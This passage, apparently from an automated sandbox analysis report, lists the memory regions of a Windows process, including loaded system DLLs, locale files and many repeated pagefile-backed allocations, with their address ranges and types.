"c:\\windows\\system32\\locale.nls") Region: id = 1562 
start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1563 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1564 start_va = 0x6f0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1565 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1566 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1567 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1568 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1569 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1570 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1571 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: 
"c:\\windows\\system32\\advapi32.dll") Region: id = 1572 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1573 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1574 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1576 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1577 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1578 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1579 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1580 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 1581 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1621 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1622 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1623 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1624 start_va = 0x7f0000 end_va = 0x13effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1625 start_va = 0x13f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1626 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1627 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1628 start_va = 0x320000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1629 start_va = 0x1530000 end_va = 0x17fefff entry_point = 0x1530000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1631 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000290000" filename = "" Region: id = 1632 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1714 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1715 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1716 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1717 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1718 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1719 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1720 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1721 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1722 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1723 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1724 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1725 start_va 
= 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1726 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1727 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1728 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1729 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1730 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1731 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1732 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1733 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1734 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1735 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1736 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1737 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id 
= 1738 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1739 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1740 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1741 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1742 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1743 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1744 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1745 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1746 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1747 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1748 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1765 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1766 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename 
= "" Region: id = 1767 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1768 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1769 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1770 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1771 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1772 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1773 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1774 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1775 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1776 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1777 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1778 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1779 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 1780 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1781 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1782 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1783 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1784 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1785 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1786 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1787 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1788 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1789 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1790 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1791 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1792 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1793 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1794 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1795 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1806 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1807 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1808 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1809 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1810 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1811 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1812 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1813 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1814 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1815 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1816 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1817 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1818 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1819 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1820 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1821 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1822 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1823 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1824 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1825 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1826 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1827 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1828 start_va = 0x2a0000 end_va = 
0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1829 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1830 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1831 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1832 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1833 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1834 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1835 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1836 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1837 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1838 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1839 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1840 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1866 start_va = 
0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1867 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1868 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1869 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1870 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1871 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1872 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1873 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1874 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1875 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1876 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1877 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1878 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
1879 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1880 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1881 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1937 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1938 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1939 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1941 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1944 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1945 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 1946 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1947 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1948 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 1959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
